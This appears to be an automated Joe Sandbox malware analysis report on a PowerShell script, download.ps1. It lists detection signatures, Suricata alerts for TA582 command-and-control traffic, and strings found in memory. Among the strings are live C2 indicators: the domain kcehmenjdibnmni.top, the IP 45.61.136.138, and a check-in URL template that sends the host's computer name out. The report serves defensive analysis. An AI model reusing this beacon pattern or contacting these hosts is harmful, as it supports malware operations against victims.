Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1584476
MD5:9634cf38abc46be36b46474f183913a7
SHA1:c07fa000b7acd4fef57a14693dc6639e70d0af2b
SHA256:64a364c581318226bdeee69fdd6097a2b17599e9eaccea487e01c878424ab7fc
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • powershell.exe (PID: 5816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5816, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5816, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T16:31:04.288233+010020577411A Network Trojan was detected192.168.11.204975145.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T16:31:03.413660+010028594881Domain Observed Used for C2 Detected192.168.11.20496581.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T16:31:04.288233+010018100002Potentially Bad Traffic192.168.11.204975145.61.136.13880TCP
2025-01-05T16:31:04.664456+010018100002Potentially Bad Traffic192.168.11.2049752142.250.191.10080TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: download.ps1Virustotal: Detection: 11%Perma Link
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.48236697992.000002C3E5172000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.48236697992.000002C3E512D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.48237450709.000002C3E53A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.48236697992.000002C3E518C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48236697992.000002C3E50E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdbZ source: powershell.exe, 00000000.00000002.48235434186.000002C3E502C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb] source: powershell.exe, 00000000.00000002.48236697992.000002C3E5172000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbH source: powershell.exe, 00000000.00000002.48236697992.000002C3E518C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.48236697992.000002C3E512D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbL source: powershell.exe, 00000000.00000002.48237450709.000002C3E53BF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2859488 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:49658 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49751 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49752 -> 142.250.191.100:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49751 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /sgat4cebpihtr.php?id=computer&key=24472055606&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /sgat4cebpihtr.php?id=computer&key=24472055606&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3qzyKBayzRM1Tb0n3R1AfU2t-svcedm" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="SW-sv7i-eaS8-XCWYx_-eg">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjghc6Z896KAxVqm4kEHbrnCQQQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png" width="32"><span>Score one final special offer for </span><a href="https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwjghc6Z896KAxVqm4kEHbrnCQQQ8IcBCAY" rel="nofollow">NFL Sunday Ticket</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="SW-sv7i-eaS8-XCWYx_-eg">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="SW-sv7i-eaS8-XCWYx_-eg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: href=https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_ equals www.youtube.com (Youtube)
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: href=https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwjghc6Z896KAxVqm4kEHbrnCQQQ8IcBCAY equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kcehmenjdibnmni.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$xf8o4gnevib316q/$17l8kfj5a4enoxz.php?id=$env:computername&key=$dzthxgyfaewj&s=527
Source: powershell.exe, 00000000.00000002.48209289305.000002C3CCB84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.48209289305.000002C3CCB84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.48235209078.000002C3E4EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CCCE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kcehmenjdibnmni.top
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kcehmenjdibnmni.top/sgat4cebpihtr.php?id=computer&key=24472055606&s=527
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE15A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE29E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE28F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE280000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE285000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE28A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CDF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageXz
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CCC61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCCE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.48235434186.000002C3E5000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micft.com/pki/certs/MicWinPCA_2010-07-06.crt0
Source: powershell.exe, 00000000.00000002.48237450709.000002C3E53A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.48237450709.000002C3E53A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.PKI/
Source: powershell.exe, 00000000.00000002.48209289305.000002C3CCB84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CCC61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.comXz
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCDDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24Xz
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CE2B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24h
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CE429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDB8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96Xz
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCCD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.48209289305.000002C3CCB84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
